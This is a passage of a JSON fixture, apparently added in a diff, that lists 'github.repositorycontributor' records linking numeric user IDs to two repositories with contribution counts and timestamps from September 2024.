"2024-09-22T10:38:39.835Z", + "nest_updated_at": "2024-09-22T20:23:54.283Z", + "contributions_count": 4, + "repository": 1427, + "user": 8386 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10785, + "fields": { + "nest_created_at": "2024-09-22T10:38:40.147Z", + "nest_updated_at": "2024-09-22T20:23:54.631Z", + "contributions_count": 4, + "repository": 1427, + "user": 5664 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10786, + "fields": { + "nest_created_at": "2024-09-22T10:38:40.477Z", + "nest_updated_at": "2024-09-22T20:23:54.946Z", + "contributions_count": 4, + "repository": 1427, + "user": 8387 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10787, + "fields": { + "nest_created_at": "2024-09-22T10:38:40.787Z", + "nest_updated_at": "2024-09-22T20:23:55.262Z", + "contributions_count": 3, + "repository": 1427, + "user": 8388 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10788, + "fields": { + "nest_created_at": "2024-09-22T10:38:41.099Z", + "nest_updated_at": "2024-09-22T20:23:55.607Z", + "contributions_count": 3, + "repository": 1427, + "user": 8389 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10789, + "fields": { + "nest_created_at": "2024-09-22T10:38:41.419Z", + "nest_updated_at": "2024-09-22T20:23:55.927Z", + "contributions_count": 3, + "repository": 1427, + "user": 8390 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10790, + "fields": { + "nest_created_at": "2024-09-22T10:38:41.729Z", + "nest_updated_at": "2024-09-22T20:23:56.247Z", + "contributions_count": 3, + "repository": 1427, + "user": 8391 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10791, + "fields": { + "nest_created_at": "2024-09-22T10:38:42.047Z", + "nest_updated_at": "2024-09-22T20:23:56.590Z", + "contributions_count": 3, + "repository": 1427, + "user": 8392 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10792, + "fields": { + "nest_created_at": "2024-09-22T10:38:42.370Z", + "nest_updated_at": "2024-09-22T20:23:56.964Z", + "contributions_count": 3, + "repository": 1427, + "user": 838 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10793, + "fields": { + "nest_created_at": "2024-09-22T10:38:42.695Z", + "nest_updated_at": "2024-09-22T20:23:57.341Z", + "contributions_count": 3, + "repository": 1427, + "user": 8393 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10794, + "fields": { + "nest_created_at": "2024-09-22T10:38:43.042Z", + "nest_updated_at": "2024-09-22T20:23:57.653Z", + "contributions_count": 2, + "repository": 1427, + "user": 8394 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10795, + "fields": { + "nest_created_at": "2024-09-22T10:38:43.362Z", + "nest_updated_at": "2024-09-22T20:23:57.971Z", + "contributions_count": 2, + "repository": 1427, + "user": 8395 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10796, + "fields": { + "nest_created_at": "2024-09-22T10:38:43.667Z", + "nest_updated_at": "2024-09-22T20:23:58.284Z", + "contributions_count": 2, + "repository": 1427, + "user": 8396 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10797, + "fields": { + "nest_created_at": "2024-09-22T10:38:43.983Z", + "nest_updated_at": "2024-09-22T20:23:58.596Z", + "contributions_count": 2, + "repository": 1427, + "user": 8397 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10798, + "fields": { + "nest_created_at": "2024-09-22T10:38:44.314Z", + "nest_updated_at": "2024-09-22T20:23:58.904Z", + "contributions_count": 2, + "repository": 1427, + "user": 8398 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10799, + "fields": { + "nest_created_at": "2024-09-22T10:38:44.626Z", + "nest_updated_at": "2024-09-22T20:23:59.214Z", + "contributions_count": 2, + "repository": 1427, + "user": 8399 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10800, + "fields": { + "nest_created_at": "2024-09-22T10:38:44.935Z", + "nest_updated_at": "2024-09-22T20:23:59.525Z", + "contributions_count": 2, + "repository": 1427, + "user": 8400 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10801, + "fields": { + "nest_created_at": "2024-09-22T10:38:45.252Z", + "nest_updated_at": "2024-09-22T20:23:59.873Z", + "contributions_count": 2, + "repository": 1427, + "user": 8401 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10802, + "fields": { + "nest_created_at": "2024-09-22T10:38:45.560Z", + "nest_updated_at": "2024-09-22T20:24:00.187Z", + "contributions_count": 2, + "repository": 1427, + "user": 8402 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10803, + "fields": { + "nest_created_at": "2024-09-22T10:38:45.872Z", + "nest_updated_at": "2024-09-22T20:24:00.538Z", + "contributions_count": 2, + "repository": 1427, + "user": 8403 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10804, + "fields": { + "nest_created_at": "2024-09-22T10:38:46.179Z", + "nest_updated_at": "2024-09-22T20:24:00.849Z", + "contributions_count": 2, + "repository": 1427, + "user": 328 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10805, + "fields": { + "nest_created_at": "2024-09-22T10:38:46.541Z", + "nest_updated_at": "2024-09-22T20:24:01.163Z", + "contributions_count": 2, + "repository": 1427, + "user": 8404 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10806, + "fields": { + "nest_created_at": "2024-09-22T10:38:46.849Z", + "nest_updated_at": "2024-09-22T20:24:01.476Z", + "contributions_count": 2, + "repository": 1427, + "user": 8405 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10807, + "fields": { + "nest_created_at": "2024-09-22T10:38:47.163Z", + "nest_updated_at": "2024-09-22T20:24:01.792Z", + "contributions_count": 2, + "repository": 1427, + "user": 8406 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10808, + "fields": { + "nest_created_at": "2024-09-22T10:38:47.472Z", + "nest_updated_at": "2024-09-22T20:24:02.129Z", + "contributions_count": 2, + "repository": 1427, + "user": 4496 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10809, + "fields": { + "nest_created_at": "2024-09-22T10:38:47.792Z", + "nest_updated_at": "2024-09-22T20:24:02.448Z", + "contributions_count": 2, + "repository": 1427, + "user": 8407 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10810, + "fields": { + "nest_created_at": "2024-09-22T10:38:48.101Z", + "nest_updated_at": "2024-09-22T20:24:02.806Z", + "contributions_count": 1, + "repository": 1427, + "user": 8408 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10811, + "fields": { + "nest_created_at": "2024-09-22T10:38:48.413Z", + "nest_updated_at": "2024-09-22T20:24:03.130Z", + "contributions_count": 1, + "repository": 1427, + "user": 8409 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10812, + "fields": { + "nest_created_at": "2024-09-22T10:38:48.766Z", + "nest_updated_at": "2024-09-22T20:24:03.436Z", + "contributions_count": 1, + "repository": 1427, + "user": 8410 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10813, + "fields": { + "nest_created_at": "2024-09-22T10:38:49.119Z", + "nest_updated_at": "2024-09-22T20:24:03.780Z", + "contributions_count": 1, + "repository": 1427, + "user": 8411 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10814, + "fields": { + "nest_created_at": "2024-09-22T10:38:49.427Z", + "nest_updated_at": "2024-09-22T20:24:04.090Z", + "contributions_count": 1, + "repository": 1427, + "user": 8412 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10815, + "fields": { + "nest_created_at": "2024-09-22T10:38:49.734Z", + "nest_updated_at": "2024-09-22T20:24:04.400Z", + "contributions_count": 1, + "repository": 1427, + "user": 8413 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10816, + "fields": { + "nest_created_at": "2024-09-22T10:38:50.062Z", + "nest_updated_at": "2024-09-22T20:24:04.776Z", + "contributions_count": 1, + "repository": 1427, + "user": 8414 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10817, + "fields": { + "nest_created_at": "2024-09-22T10:38:50.376Z", + "nest_updated_at": "2024-09-22T20:24:05.096Z", + "contributions_count": 1, + "repository": 1427, + "user": 920 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10818, + "fields": { + "nest_created_at": "2024-09-22T10:38:50.693Z", + "nest_updated_at": "2024-09-22T20:24:05.408Z", + "contributions_count": 1, + "repository": 1427, + "user": 8415 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10819, + "fields": { + "nest_created_at": "2024-09-22T10:38:51.026Z", + "nest_updated_at": "2024-09-22T20:24:05.718Z", + "contributions_count": 1, + "repository": 1427, + "user": 8416 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10820, + "fields": { + "nest_created_at": "2024-09-22T10:38:51.337Z", + "nest_updated_at": "2024-09-22T20:24:06.030Z", + "contributions_count": 1, + "repository": 1427, + "user": 8417 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10821, + "fields": { + "nest_created_at": "2024-09-22T10:38:51.687Z", + "nest_updated_at": "2024-09-22T20:24:06.339Z", + "contributions_count": 1, + "repository": 1427, + "user": 5076 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10822, + "fields": { + "nest_created_at": "2024-09-22T10:38:51.996Z", + "nest_updated_at": "2024-09-22T20:24:06.662Z", + "contributions_count": 1, + "repository": 1427, + "user": 8418 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10823, + "fields": { + "nest_created_at": "2024-09-22T10:38:52.317Z", + "nest_updated_at": "2024-09-22T20:24:06.970Z", + "contributions_count": 1, + "repository": 1427, + "user": 8419 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10824, + "fields": { + "nest_created_at": "2024-09-22T10:38:52.636Z", + "nest_updated_at": "2024-09-22T20:24:07.303Z", + "contributions_count": 1, + "repository": 1427, + "user": 8420 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10825, + "fields": { + "nest_created_at": "2024-09-22T10:38:52.953Z", + "nest_updated_at": "2024-09-22T20:24:07.612Z", + "contributions_count": 1, + "repository": 1427, + "user": 8421 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10826, + "fields": { + "nest_created_at": "2024-09-22T10:38:53.271Z", + "nest_updated_at": "2024-09-22T20:24:07.927Z", + "contributions_count": 1, + "repository": 1427, + "user": 8422 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10827, + "fields": { + "nest_created_at": "2024-09-22T10:38:53.580Z", + "nest_updated_at": "2024-09-22T20:24:08.249Z", + "contributions_count": 1, + "repository": 1427, + "user": 8423 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10828, + "fields": { + "nest_created_at": "2024-09-22T10:38:53.891Z", + "nest_updated_at": "2024-09-22T20:24:08.567Z", + "contributions_count": 1, + "repository": 1427, + "user": 8424 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10829, + "fields": { + "nest_created_at": "2024-09-22T10:38:54.202Z", + "nest_updated_at": "2024-09-22T20:24:08.885Z", + "contributions_count": 1, + "repository": 1427, + "user": 8425 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10830, + "fields": { + "nest_created_at": "2024-09-22T10:38:54.522Z", + "nest_updated_at": "2024-09-22T20:24:09.199Z", + "contributions_count": 1, + "repository": 1427, + "user": 6435 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10831, + "fields": { + "nest_created_at": "2024-09-22T10:38:54.828Z", + "nest_updated_at": "2024-09-22T20:24:09.522Z", + "contributions_count": 1, + "repository": 1427, + "user": 8426 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10832, + "fields": { + "nest_created_at": "2024-09-22T10:38:55.147Z", + "nest_updated_at": "2024-09-22T20:24:09.834Z", + "contributions_count": 1, + "repository": 1427, + "user": 8427 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10833, + "fields": { + "nest_created_at": "2024-09-22T10:38:55.497Z", + "nest_updated_at": "2024-09-22T20:24:10.151Z", + "contributions_count": 1, + "repository": 1427, + "user": 8428 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10834, + "fields": { + "nest_created_at": "2024-09-22T10:38:55.818Z", + "nest_updated_at": "2024-09-22T20:24:10.458Z", + "contributions_count": 1, + "repository": 1427, + "user": 8429 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10835, + "fields": { + "nest_created_at": "2024-09-22T10:38:56.135Z", + "nest_updated_at": "2024-09-22T20:24:10.784Z", + "contributions_count": 1, + "repository": 1427, + "user": 8430 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10836, + "fields": { + "nest_created_at": "2024-09-22T10:38:56.456Z", + "nest_updated_at": "2024-09-22T20:24:11.095Z", + "contributions_count": 1, + "repository": 1427, + "user": 2849 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10837, + "fields": { + "nest_created_at": "2024-09-22T10:38:56.774Z", + "nest_updated_at": "2024-09-22T20:24:11.411Z", + "contributions_count": 1, + "repository": 1427, + "user": 8431 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10838, + "fields": { + "nest_created_at": "2024-09-22T10:38:57.092Z", + "nest_updated_at": "2024-09-22T20:24:11.730Z", + "contributions_count": 1, + "repository": 1427, + "user": 1593 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10839, + "fields": { + "nest_created_at": "2024-09-22T10:38:57.398Z", + "nest_updated_at": "2024-09-22T20:24:12.053Z", + "contributions_count": 1, + "repository": 1427, + "user": 8432 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10840, + "fields": { + "nest_created_at": "2024-09-22T10:38:57.716Z", + "nest_updated_at": "2024-09-22T20:24:12.386Z", + "contributions_count": 1, + "repository": 1427, + "user": 1692 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10841, + "fields": { + "nest_created_at": "2024-09-22T10:38:58.024Z", + "nest_updated_at": "2024-09-22T20:24:12.697Z", + "contributions_count": 1, + "repository": 1427, + "user": 8433 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10842, + "fields": { + "nest_created_at": "2024-09-22T10:38:58.337Z", + "nest_updated_at": "2024-09-22T20:24:13.008Z", + "contributions_count": 1, + "repository": 1427, + "user": 8434 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10843, + "fields": { + "nest_created_at": "2024-09-22T10:38:58.689Z", + "nest_updated_at": "2024-09-22T20:24:13.380Z", + "contributions_count": 1, + "repository": 1427, + "user": 8435 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10844, + "fields": { + "nest_created_at": "2024-09-22T10:38:59.015Z", + "nest_updated_at": "2024-09-22T20:24:13.691Z", + "contributions_count": 1, + "repository": 1427, + "user": 8436 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10845, + "fields": { + "nest_created_at": "2024-09-22T10:38:59.336Z", + "nest_updated_at": "2024-09-22T20:24:14.003Z", + "contributions_count": 1, + "repository": 1427, + "user": 8437 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10846, + "fields": { + "nest_created_at": "2024-09-22T10:38:59.706Z", + "nest_updated_at": "2024-09-22T20:24:14.315Z", + "contributions_count": 1, + "repository": 1427, + "user": 8438 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10847, + "fields": { + "nest_created_at": "2024-09-22T10:39:00.021Z", + "nest_updated_at": "2024-09-22T20:24:14.669Z", + "contributions_count": 1, + "repository": 1427, + "user": 8439 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10848, + "fields": { + "nest_created_at": "2024-09-22T10:39:00.333Z", + "nest_updated_at": "2024-09-22T20:24:14.981Z", + "contributions_count": 1, + "repository": 1427, + "user": 8440 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10849, + "fields": { + "nest_created_at": "2024-09-22T10:39:00.672Z", + "nest_updated_at": "2024-09-22T20:24:15.291Z", + "contributions_count": 1, + "repository": 1427, + "user": 8441 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10850, + "fields": { + "nest_created_at": "2024-09-22T10:39:01.041Z", + "nest_updated_at": "2024-09-22T20:24:15.612Z", + "contributions_count": 1, + "repository": 1427, + "user": 8442 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10851, + "fields": { + "nest_created_at": "2024-09-22T10:39:01.369Z", + "nest_updated_at": "2024-09-22T20:24:15.956Z", + "contributions_count": 1, + "repository": 1427, + "user": 8443 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10852, + "fields": { + "nest_created_at": "2024-09-22T10:39:01.677Z", + "nest_updated_at": "2024-09-22T20:24:16.277Z", + "contributions_count": 1, + "repository": 1427, + "user": 8444 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10853, + "fields": { + "nest_created_at": "2024-09-22T10:39:02.032Z", + "nest_updated_at": "2024-09-22T20:24:16.607Z", + "contributions_count": 1, + "repository": 1427, + "user": 8445 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10854, + "fields": { + "nest_created_at": "2024-09-22T10:39:02.372Z", + "nest_updated_at": "2024-09-22T20:24:16.920Z", + "contributions_count": 1, + "repository": 1427, + "user": 5305 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10855, + "fields": { + "nest_created_at": "2024-09-22T10:39:02.686Z", + "nest_updated_at": "2024-09-22T20:24:17.253Z", + "contributions_count": 1, + "repository": 1427, + "user": 1529 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10856, + "fields": { + "nest_created_at": "2024-09-22T10:39:03.001Z", + "nest_updated_at": "2024-09-22T20:24:17.571Z", + "contributions_count": 1, + "repository": 1427, + "user": 8446 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10857, + "fields": { + "nest_created_at": "2024-09-22T10:39:03.327Z", + "nest_updated_at": "2024-09-22T20:24:17.912Z", + "contributions_count": 1, + "repository": 1427, + "user": 5973 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10858, + "fields": { + "nest_created_at": "2024-09-22T10:39:03.639Z", + "nest_updated_at": "2024-09-22T20:24:18.300Z", + "contributions_count": 1, + "repository": 1427, + "user": 8447 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10859, + "fields": { + "nest_created_at": "2024-09-22T10:39:04.289Z", + "nest_updated_at": "2024-09-22T20:24:19.007Z", + "contributions_count": 1, + "repository": 1427, + "user": 8448 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10860, + "fields": { + "nest_created_at": "2024-09-22T10:39:04.600Z", + "nest_updated_at": "2024-09-22T20:24:19.319Z", + "contributions_count": 1, + "repository": 1427, + "user": 8034 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10861, + "fields": { + "nest_created_at": "2024-09-22T10:39:04.931Z", + "nest_updated_at": "2024-09-22T20:24:19.633Z", + "contributions_count": 1, + "repository": 1427, + "user": 8449 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10862, + "fields": { + "nest_created_at": "2024-09-22T10:39:05.247Z", + "nest_updated_at": "2024-09-22T20:24:19.947Z", + "contributions_count": 1, + "repository": 1427, + "user": 8450 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10863, + "fields": { + "nest_created_at": "2024-09-22T10:39:05.557Z", + "nest_updated_at": "2024-09-22T20:24:20.261Z", + "contributions_count": 1, + "repository": 1427, + "user": 8451 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10864, + "fields": { + "nest_created_at": "2024-09-22T10:40:43.248Z", + "nest_updated_at": "2024-09-22T20:25:54.387Z", + "contributions_count": 650, + "repository": 1428, + "user": 2853 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10865, + "fields": { + "nest_created_at": "2024-09-22T10:40:43.562Z", + "nest_updated_at": "2024-09-22T20:25:54.696Z", + "contributions_count": 379, + "repository": 1428, + "user": 2891 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10866, + "fields": { + "nest_created_at": "2024-09-22T10:40:43.880Z", + "nest_updated_at": "2024-09-22T20:25:55.033Z", + "contributions_count": 243, + "repository": 1428, + "user": 8452 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10867, + "fields": { + "nest_created_at": "2024-09-22T10:40:44.191Z", + "nest_updated_at": "2024-09-22T20:25:55.344Z", + "contributions_count": 126, + "repository": 1428, + "user": 8453 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10868, + "fields": { + "nest_created_at": "2024-09-22T10:40:44.500Z", + "nest_updated_at": "2024-09-22T20:25:55.699Z", + "contributions_count": 80, + "repository": 1428, + "user": 8454 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10869, + "fields": { + "nest_created_at": "2024-09-22T10:40:44.808Z", + "nest_updated_at": "2024-09-22T20:25:56.046Z", + "contributions_count": 57, + "repository": 1428, + "user": 8455 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10870, + "fields": { + "nest_created_at": "2024-09-22T10:40:45.120Z", + "nest_updated_at": "2024-09-22T20:25:56.362Z", + "contributions_count": 54, + "repository": 1428, + "user": 2852 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10871, + "fields": { + "nest_created_at": "2024-09-22T10:40:45.428Z", + "nest_updated_at": "2024-09-22T20:25:56.672Z", + "contributions_count": 50, + "repository": 1428, + "user": 8456 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10872, + "fields": { + "nest_created_at": "2024-09-22T10:40:45.750Z", + "nest_updated_at": "2024-09-22T20:25:56.982Z", + "contributions_count": 39, + "repository": 1428, + "user": 6044 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10873, + "fields": { + "nest_created_at": "2024-09-22T10:40:46.062Z", + "nest_updated_at": "2024-09-22T20:25:57.291Z", + "contributions_count": 30, + "repository": 1428, + "user": 8457 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10874, + "fields": { + "nest_created_at": "2024-09-22T10:40:46.397Z", + "nest_updated_at": "2024-09-22T20:25:57.606Z", + "contributions_count": 21, + "repository": 1428, + "user": 287 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10875, + "fields": { + "nest_created_at": "2024-09-22T10:40:46.707Z", + "nest_updated_at": "2024-09-22T20:25:57.948Z", + "contributions_count": 20, + "repository": 1428, + "user": 2870 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10876, + "fields": { + "nest_created_at": "2024-09-22T10:40:47.022Z", + "nest_updated_at": "2024-09-22T20:25:58.314Z", + "contributions_count": 19, + "repository": 1428, + "user": 8458 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10877, + "fields": { + "nest_created_at": "2024-09-22T10:40:47.339Z", + "nest_updated_at": "2024-09-22T20:25:58.659Z", + "contributions_count": 18, + "repository": 1428, + "user": 8459 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10878, + "fields": { + "nest_created_at": "2024-09-22T10:40:47.674Z", + "nest_updated_at": "2024-09-22T20:25:58.994Z", + "contributions_count": 18, + "repository": 1428, + "user": 8460 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10879, + "fields": { + "nest_created_at": "2024-09-22T10:40:47.984Z", + "nest_updated_at": "2024-09-22T20:25:59.306Z", + "contributions_count": 18, + "repository": 1428, + "user": 8461 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10880, + "fields": { + "nest_created_at": "2024-09-22T10:40:48.297Z", + "nest_updated_at": "2024-09-22T20:25:59.624Z", + "contributions_count": 18, + "repository": 1428, + "user": 8462 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10881, + "fields": { + "nest_created_at": "2024-09-22T10:40:48.606Z", + "nest_updated_at": "2024-09-22T20:25:59.937Z", + "contributions_count": 16, + "repository": 1428, + "user": 2864 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10882, + "fields": { + "nest_created_at": "2024-09-22T10:40:48.929Z", + "nest_updated_at": "2024-09-22T20:26:00.272Z", + "contributions_count": 13, + "repository": 1428, + "user": 8463 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10883, + "fields": { + "nest_created_at": "2024-09-22T10:40:49.241Z", + "nest_updated_at": "2024-09-22T20:26:00.580Z", + "contributions_count": 11, + "repository": 1428, + "user": 8464 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10884, + "fields": { + "nest_created_at": "2024-09-22T10:40:49.565Z", + "nest_updated_at": "2024-09-22T20:26:00.960Z", + "contributions_count": 10, + "repository": 1428, + "user": 2879 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10885, + "fields": { + "nest_created_at": "2024-09-22T10:40:49.902Z", + "nest_updated_at": "2024-09-22T20:26:01.277Z", + "contributions_count": 10, + "repository": 1428, + "user": 8465 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10886, + "fields": { + "nest_created_at": "2024-09-22T10:40:50.211Z", + "nest_updated_at": "2024-09-22T20:26:01.594Z", + "contributions_count": 9, + "repository": 1428, + "user": 8466 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10887, + "fields": { + "nest_created_at": "2024-09-22T10:40:50.527Z", + "nest_updated_at": "2024-09-22T20:26:01.906Z", + "contributions_count": 9, + "repository": 1428, + "user": 8467 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10888, + "fields": { + "nest_created_at": "2024-09-22T10:40:50.839Z", + "nest_updated_at": "2024-09-22T20:26:02.218Z", + "contributions_count": 8, + "repository": 1428, + "user": 8468 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10889, + "fields": { + "nest_created_at": "2024-09-22T10:40:51.153Z", + "nest_updated_at": "2024-09-22T20:26:02.542Z", + "contributions_count": 8, + "repository": 1428, + "user": 8469 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10890, + "fields": { + "nest_created_at": "2024-09-22T10:40:51.484Z", + "nest_updated_at": "2024-09-22T20:26:02.860Z", + "contributions_count": 7, + "repository": 1428, + "user": 8470 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10891, + "fields": { + "nest_created_at": "2024-09-22T10:40:51.804Z", + "nest_updated_at": "2024-09-22T20:26:03.203Z", + "contributions_count": 7, + "repository": 1428, + "user": 8471 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10892, + "fields": { + "nest_created_at": "2024-09-22T10:40:52.115Z", + "nest_updated_at": "2024-09-22T20:26:03.522Z", + "contributions_count": 6, + "repository": 1428, + "user": 2882 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10893, + "fields": { + "nest_created_at": "2024-09-22T10:40:52.426Z", + "nest_updated_at": "2024-09-22T20:26:03.833Z", + "contributions_count": 6, + "repository": 1428, + "user": 8472 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10894, + "fields": { + "nest_created_at": "2024-09-22T10:40:52.737Z", + "nest_updated_at": "2024-09-22T20:26:04.143Z", + "contributions_count": 6, + "repository": 1428, + "user": 2854 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10895, + "fields": { + "nest_created_at": "2024-09-22T10:40:53.056Z", + "nest_updated_at": "2024-09-22T20:26:04.458Z", + "contributions_count": 5, + "repository": 1428, + "user": 2886 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10896, + "fields": { + "nest_created_at": "2024-09-22T10:40:53.370Z", + "nest_updated_at": "2024-09-22T20:26:04.771Z", + "contributions_count": 5, + "repository": 1428, + "user": 2869 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10897, + "fields": { + "nest_created_at": "2024-09-22T10:40:53.689Z", + "nest_updated_at": "2024-09-22T20:26:05.085Z", + "contributions_count": 4, + "repository": 1428, + "user": 2887 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10898, + "fields": { + "nest_created_at": "2024-09-22T10:40:54.033Z", + "nest_updated_at": "2024-09-22T20:26:05.400Z", + "contributions_count": 3, + "repository": 1428, + "user": 2890 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10899, + "fields": { + "nest_created_at": "2024-09-22T10:40:54.357Z", + "nest_updated_at": "2024-09-22T20:26:05.772Z", + "contributions_count": 3, + "repository": 1428, + "user": 6147 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10900, + "fields": { + "nest_created_at": "2024-09-22T10:40:54.702Z", + "nest_updated_at": "2024-09-22T20:26:06.083Z", + "contributions_count": 2, + "repository": 1428, + "user": 2850 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10901, + "fields": { + "nest_created_at": "2024-09-22T10:40:55.088Z", + "nest_updated_at": "2024-09-22T20:26:06.397Z", + "contributions_count": 2, + "repository": 1428, + "user": 8473 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10902, + "fields": { + "nest_created_at": "2024-09-22T10:40:55.426Z", + "nest_updated_at": "2024-09-22T20:26:06.738Z", + "contributions_count": 2, + "repository": 1428, + "user": 8474 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10903, + "fields": { + "nest_created_at": "2024-09-22T10:40:55.842Z", + "nest_updated_at": "2024-09-22T20:26:07.052Z", + "contributions_count": 1, + "repository": 1428, + "user": 8475 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10904, + "fields": { + "nest_created_at": "2024-09-22T10:40:56.150Z", + "nest_updated_at": "2024-09-22T20:26:07.380Z", + "contributions_count": 1, + "repository": 1428, + "user": 4090 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10905, + "fields": { + "nest_created_at": "2024-09-22T10:40:56.474Z", + "nest_updated_at": "2024-09-22T20:26:07.698Z", + "contributions_count": 1, + "repository": 1428, + "user": 395 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10906, + "fields": { + "nest_created_at": "2024-09-22T10:40:56.797Z", + "nest_updated_at": "2024-09-22T20:26:08.021Z", + "contributions_count": 1, + "repository": 1428, + "user": 5481 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10907, + "fields": { + "nest_created_at": "2024-09-22T10:40:57.134Z", + "nest_updated_at": "2024-09-22T20:26:08.330Z", + "contributions_count": 1, + "repository": 1428, + "user": 8476 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 10908, + "fields": { + "nest_created_at": 